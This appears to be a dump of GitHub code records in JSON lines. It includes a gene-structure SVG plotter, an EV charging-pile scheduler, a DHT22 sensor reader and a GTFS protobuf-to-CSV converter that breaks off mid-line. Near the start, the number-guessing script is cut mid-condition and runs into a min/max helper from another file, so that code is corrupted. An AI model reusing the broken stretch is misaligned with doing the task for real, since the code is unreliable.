Parameters\n ----------\n array : pyarrow.Array or pyarrow.ChunkedArray\n\n Returns\n -------\n sum : pyarrow.Scalar\n \"\"\"\n return call_function('sum', [array])\n","repo_name":"alimcmaster1/arrow","sub_path":"python/pyarrow/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"34235889042","text":"import sys,random\n\nnum1=int(sys.argv[1])\nnum2=int(sys.argv[2])\nr=random.randint(num1, num2)\nwhile True:\n a=int(input('guess a number between 1 to 10: '))\n if(num1 num1:\n MinNum = num1\n if MinNum > num2:\n MinNum = num2\n if MaxNum == -99999:\n MaxNum = num1\n if MaxNum < num1:\n MaxNum = num1\n if 
MaxNum < num2:\n MaxNum = num2\n\n return (MinNum, MaxNum)\n\ndef GetTagInfo(locus, tag, info):\n posdata=[]\n for line in info:\n line = line.strip()\n if line =='':\n continue\n if locus in line:\n columns = line.split(\"\t\")\n if tag in columns[1].lower():\n posdata.append(columns[2] + \"-\" + columns[3])\n return posdata\n\ndef GetChainOrientation(locus, info):\n chain = ''\n for line in info:\n line = line.strip()\n if line =='':\n continue\n if locus in line:\n columns = line.split(\"\t\")\n chain = columns[-1]\n break\n return chain\n\ndef GetDomainInfo(locus, tag, info):\n posdata=[]\n for line in info:\n line = line.strip()\n if line =='':\n continue\n if locus in line:\n columns = line.split(\"\t\")\n if tag in columns[1].lower():\n posdata.append(columns[4] + \"-\" + columns[2] + \"-\" + columns[3])\n return posdata\n\ndef SortCDSInfo(locus, tag, info):\n newinfo = []\n cdsposinfo = []\n for line in info:\n line = line.strip()\n if line == '':\n continue\n if locus in line and tag in line.lower():\n newinfo.append(line)\n cdsposinfo.append(int(line.split(\"\t\")[2]))\n cdsposinfo.append(int(line.split(\"\t\")[3]))\n if len(newinfo) > 0:\n chain = newinfo[0].split(\"\t\")[-1]\n if chain == \"+\":\n cdsposinfo.sort()\n else:\n cdsposinfo.sort(reverse=True)\n return cdsposinfo\n\ndef Domain2CDS(start, length, info):\n data2return =[]\n if info[0] < info[1]:\n numinfo = GetConNum(info)\n index1 = start - 1\n index2 = index1 + length - 1\n numinfo2 = GetNumRange(numinfo[index1:index2+1])\n i = 0\n while i < len(numinfo2):\n data2return.append(str(numinfo2[i]) + \"-\" + str(numinfo2[i+1]))\n i += 2\n\n else:\n numinfo = GetConNum(info)\n numinfo.sort(reverse = True)\n index1 = start - 1\n index2 = index1 + length - 1\n numinfo2 = GetNumRange(numinfo[index1:index2+1])\n i = 0\n while i < len(numinfo2):\n data2return.append(str(numinfo2[i]) + \"-\" + str(numinfo2[i+1]))\n i += 2\n\n return data2return\n\ndef GetConNum(info2):\n info2.sort()\n numlist = []\n i = 1\n while i < len(info2):\n for x in range(int(info2[i-1]), int(info2[i])+1):\n numlist.append(x)\n i = i + 2\n return numlist\n\ndef GetNumRange(connumlist):\n start = connumlist[0]\n rannumlist = [start,]\n i = 1\n while i < len(connumlist)-1:\n if abs(connumlist[i]-connumlist[i-1]) == 1 and abs(connumlist[i]-connumlist[i+1]) == 1:\n pass\n else:\n rannumlist.append(connumlist[i])\n i += 1\n rannumlist.append(connumlist[-1])\n return rannumlist\n\n\n\n## Argument parsing\nimport argparse\nparser = argparse.ArgumentParser(\n description=\"This program draws gene structure diagrams in SVG format.\" + \"\n\nVersion: \" + __version__,\n epilog=\"Please Enjoy this Program!\")\nparser.add_argument(\n \"-i\", \"-in\", \"--input\",\n metavar=\"genefile\",\n dest=\"input\",\n type=str,\n help=\"file to input\")\n\nparser.add_argument(\n \"-o\", \"-out\", \"--output\",\n metavar=\"outfile\",\n dest=\"output\",\n type=str,\n help=\"svg file to output\")\n\nparser.add_argument(\n \"-v\", \"--version\",\n action='version',\n help=\"The version of this program.\",\n version = \"Version: \" + __version__)\nargs = parser.parse_args()\n\ntagcolors = {\n 'cds': \"green\",\n 'sts': \"orange\",\n 'domain': \"blue\",\n 'exon': \"gold\",\n 'intron': \"darkgrey\",\n 'marker': \"black\",\n 'start_codon': \"lime\",\n 'stop_codon': \"magenta\",\n 'utr': \"hotpink\",\n}\n\ndomaincolors = [\"blue\", \"aqua\", \"brown\", \"chartreuse\", \"deeppink\", \"royalblue\", \"springgreen\", \"teal\"]\n\ntags = ['utr', 'intron', 'exon', 'cds', 'sts', 'domain', 'start_codon', 'stop_codon', 
'marker']\n\n\ninfofile=open(args.input, 'r')\ndata = infofile.readlines()\ndomain_ref = \"cds\"\ninfofile.close()\n\n## Drawing setup\nimport svgwrite\ngspaint = svgwrite.Drawing(args.output + \".svg\", debug = True)\nx0 = 5\ny0 = 15\npaintx0=1000\nlegendx0 = 900\nlegendboxx0 = legendx0 - 5\n\nlocuslist = GetLocusList(data)\nfor locus in locuslist:\n # Get the strand orientation\n chain = GetChainOrientation(locus, data)\n # Get the minimum and maximum positions\n (MinPos, MaxPos) = GetMinMax(locus, data)\n print(\"Min Value: \", MinPos)\n print(\"Max Value: \", MaxPos)\n\n Grange = MaxPos - MinPos + 1\n times = Grange / 1000\n\n # Show the gene name\n gspaint.add(gspaint.text(\n locus,\n insert=(paintx0/times, y0),\n font_size = 16,\n fill = 'black'))\n y0 = y0 +60\n legendy0 = y0 + 60\n legendboxy0 = legendy0 - 5\n unit = 1000.0\n segments = Grange // unit\n # Draw the strand orientation arrow\n if chain == '+':\n lines = gspaint.add(gspaint.g(stroke_width=2, stroke='gray', fill='none'))\n lines.add(gspaint.polyline(\n [(paintx0/times, y0 - 25), (paintx0/times + 40, y0 - 25), (paintx0/times + 40, y0 - 27.5), (paintx0/times + 45, y0 - 22.5), (paintx0/times + 40, y0 - 17.5), (paintx0/times + 40, y0 - 20), (paintx0/times, y0 - 20),(paintx0/times, y0 - 25)]))\n else:\n lines = gspaint.add(gspaint.g(stroke_width=2, stroke='gray', fill='none'))\n lines.add(gspaint.polyline(\n [(paintx0/times, y0 - 22.5), (paintx0/times + 5, y0 - 17.5), (paintx0/times + 5, y0 - 20), (paintx0/times + 45, y0 - 20), (paintx0/times + 45, y0 - 25), (paintx0/times + 5, y0 - 25), (paintx0/times + 5, y0 - 27.5),(paintx0/times, y0 - 22.5)]))\n\n\n # Draw the scale bar\n scalelen = 1000.0/Grange*1000\n gspaint.add(gspaint.line(\n ((MinPos - MinPos + paintx0)/times, y0-50),\n ((MaxPos - MinPos + paintx0)/times, y0-50),\n stroke_width=2,\n stroke=\"black\"))\n i = 1\n scalex = MinPos + unit\n while i <= segments:\n gspaint.add(gspaint.line(\n ((scalex - MinPos + paintx0)/times, y0-50),\n ((scalex - MinPos + paintx0)/times, y0-45),\n stroke_width=1,\n stroke=\"gray\"))\n gspaint.add(gspaint.text(\n str(i) + \"k\",\n insert=((scalex - MinPos + paintx0)/times - 5, y0-35),\n font_size = 8,\n fill = 'black'))\n scalex += unit\n i += 1\n\n\n\n #paint utr\n utrinfo = GetTagInfo(locus, 'utr', data)\n for info in utrinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0)/times, y0+1.5),\n size = (str(length) + \"px\", \"12px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"utr\"],\n fill = tagcolors[\"utr\"]))\n\n if len(utrinfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0+1.5),\n size = (\"40px\", \"12px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"utr\"],\n fill = tagcolors[\"utr\"]))\n gspaint.add(gspaint.text(\n \"utr\",\n insert = (legendx0 + 50, legendy0+12),\n font_size = 12,\n fill = 'black'))\n legendy0 += 25\n\n #paint intron\n introninfo = GetTagInfo(locus, 'intron', data)\n for info in introninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n gspaint.add(gspaint.line(\n ((start - MinPos + paintx0)/times, y0 + 7.5),\n ((end - MinPos + paintx0)/times, y0 + 7.5),\n stroke_width = 2,\n stroke = tagcolors[\"intron\"]))\n\n if len(introninfo) > 0:\n gspaint.add(gspaint.line(\n (legendx0, legendy0+8),\n (legendx0+40, legendy0+8),\n stroke_width = 2,\n stroke = tagcolors[\"intron\"]))\n gspaint.add(gspaint.text(\n \"intron\",\n insert = (legendx0 + 50, 
legendy0+12),\n font_size = 12,\n fill = 'black'))\n legendy0 += 25\n\n\n\n #paint exon\n exoninfo = GetTagInfo(locus, 'exon', data)\n for info in exoninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"exon\"],\n fill = tagcolors[\"exon\"]))\n\n if len(exoninfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"exon\"],\n fill = tagcolors[\"exon\"]))\n gspaint.add(gspaint.text(\n \"exon\",\n insert = (legendx0 + 50, legendy0+16),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n\n #paint cds\n cdsinfo = GetTagInfo(locus, 'cds', data)\n for info in cdsinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"cds\"],\n fill = tagcolors[\"cds\"]))\n\n if len(cdsinfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"cds\"],\n fill = tagcolors[\"cds\"]))\n gspaint.add(gspaint.text(\n \"CDS\",\n insert = (legendx0 + 50, legendy0+16),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n\n\n #paint sts\n stsinfo = GetTagInfo(locus, 'sts', data)\n for info in stsinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"sts\"],\n fill = tagcolors[\"sts\"]))\n\n if len(stsinfo) > 0:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"sts\"],\n fill = tagcolors[\"sts\"]))\n gspaint.add(gspaint.text(\n \"STS\",\n insert = (legendx0 + 50, legendy0+16),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n\n\n #paint domain\n cdsposdata = SortCDSInfo(locus, domain_ref, data)\n if cdsposdata ==[]:\n cdsposdata = SortCDSInfo(locus, \"exon\", data)\n\n domaininfo = GetDomainInfo(locus, 'domain', data)\n domainlist = []\n for line in domaininfo:\n domainlist.append(line.split(\"-\")[0])\n\n domainset= list(set(domainlist))\n domainset.sort()\n domainsetcolors={}\n index = 0\n while index < len(domainset):\n domainsetcolors[domainset[index]] = domaincolors[index]\n index += 1\n\n domainsave = []\n for line in domaininfo:\n (domain, aa1, aa2) = line.split(\"-\")\n aa1 = int(aa1)\n aa2 = int(aa2)\n nucl0 = aa1 * 3 - 2\n length = (aa2 - aa1 + 1) * 3\n domain2cdsinfo = Domain2CDS(nucl0, length, cdsposdata)\n for info in domain2cdsinfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n 
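# draw each genomic slice of this domain as a rectangle in the domain's assigned color\n 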
gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 5),\n size = (str(length) + \"px\", \"25px\"),\n stroke_width = 0.01,\n stroke = domainsetcolors[domain],\n fill = domainsetcolors[domain]))\n if domain not in domainsave:\n gspaint.add(gspaint.rect(\n insert = (legendx0, legendy0),\n size = (\"40px\", \"25px\"),\n stroke_width = 0.001,\n stroke = domainsetcolors[domain],\n fill = domainsetcolors[domain]))\n gspaint.add(gspaint.text(\n domain,\n insert = (legendx0 + 50, legendy0+16.5),\n font_size = 12,\n fill = 'black'))\n legendy0 += 35\n domainsave.append(domain)\n legendy0 -= 5\n lines = gspaint.add(gspaint.g(stroke_width=2, stroke='gray', fill='none'))\n lines.add(gspaint.polyline(\n [(legendboxx0, legendboxy0), (1010, legendboxy0), (1010, legendy0), (legendboxx0, legendy0), (legendboxx0, legendboxy0)]))\n\n\n #paint start codon\n stcodoninfo = GetTagInfo(locus, 'start_codon', data)\n for info in stcodoninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n if length < 2:\n length = 2\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0) / times, y0 - 12.5),\n size = (str(length) + \"px\", \"40px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"start_codon\"],\n fill = tagcolors[\"start_codon\"]))\n gspaint.add(gspaint.text(\n \"ATG\",\n insert = ((begin - MinPos + paintx0) / times - 10, y0 + 42),\n font_size = 10,\n fill = 'black'))\n\n #paint end codon\n endcodoninfo = GetTagInfo(locus, 'stop_codon', data)\n for info in endcodoninfo:\n (start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n if length < 2:\n length = 2\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0)/times-2, y0 - 12.5),\n size = (str(length) + \"px\", \"40px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"stop_codon\"],\n fill = tagcolors[\"stop_codon\"]))\n gspaint.add(gspaint.text(\n \"TAG\",\n insert = ((begin - MinPos + paintx0) / times - 10, y0 + 42),\n font_size = 10,\n fill = 'black'))\n\n #paint marker\n markerinfo = GetDomainInfo(locus, 'marker', data)\n for info in markerinfo:\n (marker, start, end) = info.split(\"-\")\n start = int(start)\n end = int(end)\n if start < end:\n length = end - start + 1\n begin = start\n else:\n length = start - end + 1\n begin = end\n length = length / times\n if length < 2:\n length = 2\n gspaint.add(gspaint.rect(\n insert = ((begin - MinPos + paintx0)/times-2, y0 - 12.5),\n size = (str(length) + \"px\", \"40px\"),\n stroke_width = 0.001,\n stroke = tagcolors[\"marker\"],\n fill = tagcolors[\"marker\"]))\n gspaint.add(gspaint.text(\n marker,\n insert = ((begin - MinPos + paintx0) / times - 10, y0 -20),\n font_size = 10,\n fill = 'red'))\n\n y0 = legendy0 + 50\n\ngspaint.save()\nprint(\"\"\"\n\\n\\n-------------------------\nSuccess!!!\nCongratulations to you!!!\"\"\"\n)\n\n\n","repo_name":"guochangjiang/Python.learn","sub_path":"Biopython/my.biopython/gene.structure.paint/PaintGeneStructure.py","file_name":"PaintGeneStructure.py","file_ext":"py","file_size_in_byte":18333,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"17187543289","text":"from enum import Enum\nfrom typing import Optional\nfrom classes.Timer import timer, Time\nfrom 
classes.ChargingRequest import del_charging_request, get_charging_queue_num, ChargingMode, get_charging_mode, get_charging_request, get_charging_request_user\nfrom classes.Bill import compute_price, Bill, Bill_status, bill_manager\nfrom config.sys import PILE_FAST_SPEED, PILE_NORMAL_SPEED\n\nimport threading\n\nclass PileState(Enum):\n Idle = 0\n Working = 1\n Error = 2\n\nclass PileType(Enum):\n Normal = 0\n Fast = 1\n\n# unit: 1 capacity per second\nPILE_CHARGE_SPEED = {\n PileType.Fast: PILE_FAST_SPEED / 3600,\n PileType.Normal: PILE_NORMAL_SPEED / 3600\n}\n\n\nclass ChargingInfo:\n car_id: str\n bill_id: str\n queue_num: str\n charged_amount: float\n all_amount: float\n charged_seconds: float\n waited_seconds: float\n start_time: Time\n status: int # 0 = waiting, 1 = charging, 2 = finished\n charge_speed: float\n fee: float\n\n base_amount: float\n base_seconds: float\n base_fee: float\n base_start_time: Time\n\n def __init__(self, bill_id: str, car_id: str, all_amount: float):\n self.car_id = car_id\n self.all_amount = all_amount\n self.bill_id = bill_id\n self.charged_amount = 0\n self.queue_num = get_charging_queue_num(car_id)\n self.charged_seconds = 0.0\n self.waited_seconds = 0.0\n self.start_time = None\n self.status = 0\n self.charge_speed = 0.0\n self.fee = 0.0\n \n def __lt__(self, other):\n return self.queue_num < other.queue_num\n\n def start(self,pile_id:str, type:PileType):\n self.start_time = timer.time()\n self.charge_speed = PILE_CHARGE_SPEED[type]\n self.status = 1\n bill = bill_manager.find(self.bill_id)\n bill.start(pile_id,type.value)\n\n def end(self):\n self.update()\n bill_manager.find(self.bill_id).end()\n if self.all_amount <= self.charged_amount:\n self.status = 2\n else:\n self.status = 0\n\n def update(self):\n if self.status == 1:\n cur = timer.time()\n max_duration = cur - self.start_time\n max_amount = max_duration * self.charge_speed\n if max_amount > self.all_amount:\n self.status = 2\n self.charged_amount = self.all_amount\n self.charged_seconds = self.all_amount / self.charge_speed\n else:\n self.charged_seconds = max_duration\n self.charged_amount = max_amount\n _, _, service_fee, charge_fee = compute_price(self.start_time, cur, get_charging_mode(self.car_id))\n self.fee = service_fee + charge_fee\n\n\n def time_remain(self) -> float:\n if self.status == 0:\n return -1\n elif self.status == 2:\n return 0.0\n cur = timer.time()\n return self.all_amount / self.charge_speed - (cur - self.start_time)\n \n def current(self):\n self.update()\n return self.to_dict()\n \n def current_result(self):\n self.update()\n return self.to_tuple_str()\n\n # to dict\n def to_dict(self) -> dict:\n return {\n \"car_id\": self.car_id,\n \"user_id\": get_charging_request_user(self.car_id),\n \"status\": self.status,\n \"all_amount\": self.all_amount,\n \"queue_num\": self.queue_num,\n \"start_time\": self.start_time.to_string() if self.start_time is not None else \"\",\n \"time_remain\": self.time_remain(),\n \"charged_amount\": self.charged_amount,\n \"charged_seconds\": self.charged_seconds,\n \"fee\": self.fee,\n }\n \n def to_tuple_str(self) -> str: \n my_tuple = (self.car_id, \"{:.2f}\".format(self.charged_amount), \"{:.2f}\".format(self.fee))\n return '(' + ', '.join(map(str, my_tuple)) + ')'\n\npile_callbacks = []\n\nclass ChargingPile:\n pile_id: str\n pile_type: PileType\n charge_speed: float\n status: PileState\n cars_queue: list\n total_amount: float\n task_info: ChargingInfo\n task_id: int\n start_time: Time\n lock: threading.Lock\n 
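# run time accumulated at shutdown; get_run_time() adds the in-progress session on top\n 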
run_time: float\n\n def __init__(self, pile_id: str, pile_type: PileType):\n # metadata\n self.pile_id = pile_id\n self.pile_type = pile_type\n self.charge_speed = PILE_CHARGE_SPEED[pile_type]\n\n # runtime data\n self.status = PileState.Idle\n self.task_info = None\n self.total_amount = 0.0\n self.start_time = timer.time()\n self.run_time = 0.0\n self.cars_queue = list()\n self.task_id = -1\n self.lock = threading.Lock()\n \n def end_charging(self):\n end_time = timer.time()\n print(f'{end_time.to_string()} end charging: {self.task_info.car_id}')\n self.lock.acquire()\n if self.task_info is not None:\n self.task_info.end()\n self.total_amount += self.task_info.charged_amount\n # request = get_charging_request(self.task_info.car_id)\n # bill=Bill()\n # bill.generate_request(request.user_id,self.pile_id,self.task_info.car_id,request.mode.value,self.task_info.charged_amount,self.task_info.start_time)\n # bill.persist(end_time,Bill_status.Submitted,container)\n if self.task_info.status == 2:\n del_charging_request(self.task_info.car_id)\n self.task_info = None\n self.task_id = -1\n \n if self.status != PileState.Error:\n if len(self.cars_queue) == 0:\n self.status = PileState.Idle\n self.lock.release()\n else:\n self.lock.release()\n self.start_charging()\n\n for func in pile_callbacks:\n func(ChargingMode(self.pile_type.value))\n else:\n self.lock.release()\n \n def start_charging(self):\n with self.lock:\n if self.status == PileState.Error:\n return \n if len(self.cars_queue) > 0 and self.task_info is None:\n self.task_info = self.cars_queue.pop(0)\n if self.task_info is None:\n return\n \n print(f'start charging: {self.task_info.car_id} {self.task_info.all_amount}')\n self.status = PileState.Working\n interval = self.task_info.all_amount / self.charge_speed\n print(f'charge_speed: {self.charge_speed} interval:{interval}')\n self.task_info.start(self.pile_id,self.pile_type)\n self.task_id = timer.create_task(interval, self.end_charging, args=None)\n\n def cancel_charging(self, car_id: str):\n self.lock.acquire()\n if self.task_info is not None and self.task_info.car_id == car_id:\n self.lock.release()\n timer.cancel_task(self.task_id, run = True)\n del_charging_request(car_id)\n else:\n for item in self.cars_queue:\n if item.car_id == car_id:\n self.cars_queue.remove(item)\n item.end()\n del_charging_request(car_id)\n self.lock.release()\n \n\n def queue_car(self, info:ChargingInfo, forced: bool = False):\n if not forced and len(self.cars_queue) >= 1:\n return False\n with self.lock:\n self.cars_queue.append(info)\n\n if self.status == PileState.Idle:\n self.start_charging()\n return True\n \n\n def expected_finish_time(self) -> float:\n times = 0.0\n if self.task_info is not None:\n times += self.task_info.time_remain()\n\n for info in self.cars_queue:\n times += info.time_remain()\n\n return times\n \n def get_position(self, car_id: str) -> int:\n with self.lock:\n if self.task_info is not None and self.task_info.car_id == car_id:\n return 0\n for i in range(len(self.cars_queue)):\n if self.cars_queue[i].car_id == car_id:\n return i + 1\n return -1\n\n\n def shutdown(self):\n with self.lock:\n self.status = PileState.Error\n self.run_time = timer.time() - self.start_time\n self.start_time = None\n\n l = list(self.cars_queue)\n for item in l:\n item.end()\n self.cars_queue = list()\n\n if self.task_info is not None:\n l.append(self.task_info)\n timer.cancel_task(self.task_id, run=True)\n return l\n \n\n def get_charging_info(self, car_id: str) -> Optional[ChargingInfo]:\n with self.lock:\n 
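# check the car currently being charged first, then the waiting queue\n 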
if self.task_info is not None and self.task_info.car_id == car_id:\n return self.task_info.current()\n for item in self.cars_queue:\n if item.car_id == car_id:\n return item.current()\n return None\n \n def get_waiting_list(self) -> list:\n with self.lock:\n l = list(self.cars_queue)\n return [item.current() for item in l]\n \n def get_run_time(self) -> float:\n if self.status == PileState.Error:\n return self.run_time\n else:\n return self.run_time + ((timer.time() - self.start_time) if self.start_time is not None else 0)\n \n def detail(self):\n res = {}\n with self.lock:\n if self.task_info is not None:\n res['charging'] = self.task_info.current()\n else:\n res['charging'] = None\n l = list(self.cars_queue)\n res['waiting'] = [item.current() for item in l]\n\n res['status'] = self.status.value\n res['amount'] = self.total_amount + (self.task_info.charged_amount if self.task_info is not None else 0) + sum([item.charged_amount for item in l])\n res['time'] = self.get_run_time()\n return res\n \n def result(self):\n res = {}\n with self.lock:\n if self.task_info is not None:\n res['charging_area'] = self.task_info.current_result()\n else:\n res['charging_area'] = None\n l = list(self.cars_queue)\n for item in l:\n res['queuing_area'] = item.current_result()\n return res\n\n def clear_queue(self):\n with self.lock:\n l = list(self.cars_queue)\n for item in l:\n item.end()\n self.cars_queue = list()\n return l\n\n def restart(self):\n if self.status != PileState.Error:\n return\n self.start_time = timer.time()\n self.cars_queue = list()\n self.task_id = -1\n self.status = PileState.Idle\n for func in pile_callbacks:\n func(ChargingMode(self.pile_type.value))\n\n def is_vacant(self) -> bool:\n with self.lock:\n return self.status != PileState.Error and len(self.cars_queue) == 0\n \n def numbers(self) -> int:\n num = 0\n with self.lock:\n if self.status == PileState.Error:\n return 0\n if self.task_info is not None:\n num += 1\n num += len(self.cars_queue)\n return num\n \n def get_maximum_available(self) -> int:\n with self.lock:\n result = 0\n if self.task_info is None:\n result += 1\n result += 1 - len(self.cars_queue)\n \n t = timer.time() \n print(f'{t.hour}:{t.minute} vacant: {self.pile_id} - {result}')\n return result if result > 0 else 0\n\ncharging_piles = {\n \"F1\": ChargingPile(\"F1\", PileType.Fast),\n \"F2\": ChargingPile(\"F2\", PileType.Fast),\n \"T1\": ChargingPile(\"T1\", PileType.Normal),\n \"T2\": ChargingPile(\"T2\", PileType.Normal),\n \"T3\": ChargingPile(\"T3\", PileType.Normal),\n}\n\n\ndef get_pile(pile_id: str) -> Optional[ChargingPile]:\n if pile_id in charging_piles:\n return charging_piles[pile_id]\n else:\n return None\n \n# Check whether a car is currently charging or queued at any pile\ndef is_charging(car_id: str) -> bool:\n for _, pile in charging_piles.items():\n if pile.get_charging_info(car_id) is not None:\n return True \n return False \n\n\n\n \n\n","repo_name":"ghostfly23333/ACSSBackend","sub_path":"src/classes/ChargingPile.py","file_name":"ChargingPile.py","file_ext":"py","file_size_in_byte":12382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"24053127952","text":"import time\nimport board\nimport adafruit_dht\nimport subprocess\n\n\ndef get_temperature():\n\n dhtDevice = adafruit_dht.DHT22(board.D4)\n\n try:\n # Read the values from the sensor\n temperature_c = dhtDevice.temperature\n temperature_f = temperature_c * (9 / 5) + 32\n humidity = dhtDevice.humidity\n\n tempval = {\"temp\": temperature_c, \"humidity\": 
humidity}\n\n        return tempval\n\n    except RuntimeError as error:\n        # Errors happen fairly often, DHT's are hard to read, just keep going\n        print(error.args[0])\n    except Exception as error:\n        dhtDevice.exit()\n        raise error\n\n","repo_name":"tak-st/oheya_checkn","sub_path":"device/temperature/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"19815189088","text":"'''\nThis script converts a folder of protobuf files into fully cleaned csv files.\nEach folder is expected to contain one day of GTFS data.\nThis code uses multiprocessing for faster processing.\n\nTwo inputs are required:\n\n1. The input path to the protobuf folder.\n   The input path should be provided after the file name 'tu_transform_csv_folder.py',\n   as the second System Specific Parameter (sys.argv[1])\n\n2. The output path.\n   The output path should be provided after the first input,\n   as the third System Specific Parameter (sys.argv[2])\n'''\n\n# import packages\nimport tu_all_steps\nimport sys\nimport multiprocessing\nfrom datetime import datetime\nimport glob\nimport os\nimport time\nimport pandas as pd\n\n# Get csv folder directory\ndir_ori = str(sys.argv[1])\n\n# Check whether a file is imported instead of a folder.\n# Make sure the input dir_ori is only for a csv folder.\nif dir_ori[-6:] == '.pb.gz' or dir_ori[-3:] == '.pb':\n    print('A folder path is required as the first input, not a file path')\n    sys.exit()\n\n# Add '/' to the folder path if it has no '/' at the end\nif dir_ori[-1:] != '/':\n    dir_ori += '/'\n\n# Generate file name\nfull_file_name = dir_ori.split('/')[-2]+'_all.csv.gz'\n\n# Get destination folder\nclass_layer = dir_ori.split('/')[-4]\ndate_layer = dir_ori.split('/')[-2] +'/'\ndir_dest_folder = dir_ori.replace(class_layer,'daily_tu').replace(dir_ori.split('/')[-1],'').replace(date_layer,'')\n\n# if destination path inputted, get output path.\nif len(sys.argv) >2:\n    dir_dest = str(sys.argv[2])\n# if no destination path inputted, generate the best estimate of the output path.\nelse:\n    dir_dest = dir_dest_folder + full_file_name\n\n# Check if destination folder exists. 
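# DHT22 sensors fail to read routinely, so callers of the get_temperature() function
# above typically retry. A minimal usage sketch (retry count and delay are hypothetical;
# get_temperature returns None implicitly when a RuntimeError is swallowed):
import time

def read_with_retries(retries=5, delay=2.0):
    for _ in range(retries):
        tempval = get_temperature()
        if tempval is not None:
            return tempval
        time.sleep(delay)  # give the sensor time to recover before retrying
    return None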
Create if not.\nif not os.path.exists(dir_dest_folder):\n    os.makedirs(dir_dest_folder, exist_ok=True)\n    print('Destination Folder Created: ',dir_dest_folder)\n\n# Get csv output Folder\ndir_csv_folder = dir_ori.replace(class_layer,'12_csv_transformed_tu')\n\n\n# Column dtypes shared by both csv reads below (defined once instead of duplicated inline)\nTU_DTYPES = {'id':'str', 'trip_id':'str', 'trip_schedule_relationship':'str',\n             'route_id':'str', 'vehicle_id':'str', 'stop_sequence':'Int64',\n             'stop_arrival_delay':'Int64', 'stop_departure_delay':'Int64',\n             'stop_id':'str', 'stop_schedule_relationship':'str',\n             'request_time_dt':'str', 'timestamp_dt':'str',\n             'stop_arrival_time_dt':'str', 'stop_departure_time_dt':'str',\n             'trip_start_time_dt':'str'}\n\n\n# Define the function for multiprocessing\ndef pd_to_csv(src):\n    tu_all_steps.tu_pd_to_clean_csv(src,'')\n\n# Start the parallel processing\nif __name__ == '__main__':\n\n    # Get start time for generating csv\n    tStart = datetime.now()\n    # Check number of CPUs\n    n_cpu = multiprocessing.cpu_count()\n    # Set up pool by the number of CPUs\n    pool = multiprocessing.Pool(processes = n_cpu)\n    # Get file paths within the csv folder\n    ls_dir = glob.glob(os.path.join(dir_ori + '*.pb.gz'))\n\n    # Raise an error if no file found\n    if len(ls_dir) == 0:\n        print('No File Found')\n        sys.exit()\n\n    # Run the function using multiprocessing\n    result = pool.map(pd_to_csv, ls_dir)\n\n    # Include time gap\n    time.sleep(10)\n\n    # Shut down multiprocessing\n    try:\n        pool.close()\n        pool.join()\n    except:\n        print('Unable to shut down multiprocessing')\n\n    # Print process time\n    print('Generating csv files took {} minutes'.format((datetime.now() - tStart).total_seconds()/60))\n\n    # Get start time for merge csv\n    tStart = datetime.now()\n\n    # Get file paths within the csv folder\n    ls_dir = glob.glob(os.path.join(dir_csv_folder + '*.csv.gz'))\n\n    # Raise an error if no file found\n    if len(ls_dir) == 0:\n        print('No File Found')\n        sys.exit()\n\n    # Sort ls_dir\n    ls_dir.sort()\n\n    # print(ls_dir)\n\n    # Read the first csv file\n    df = 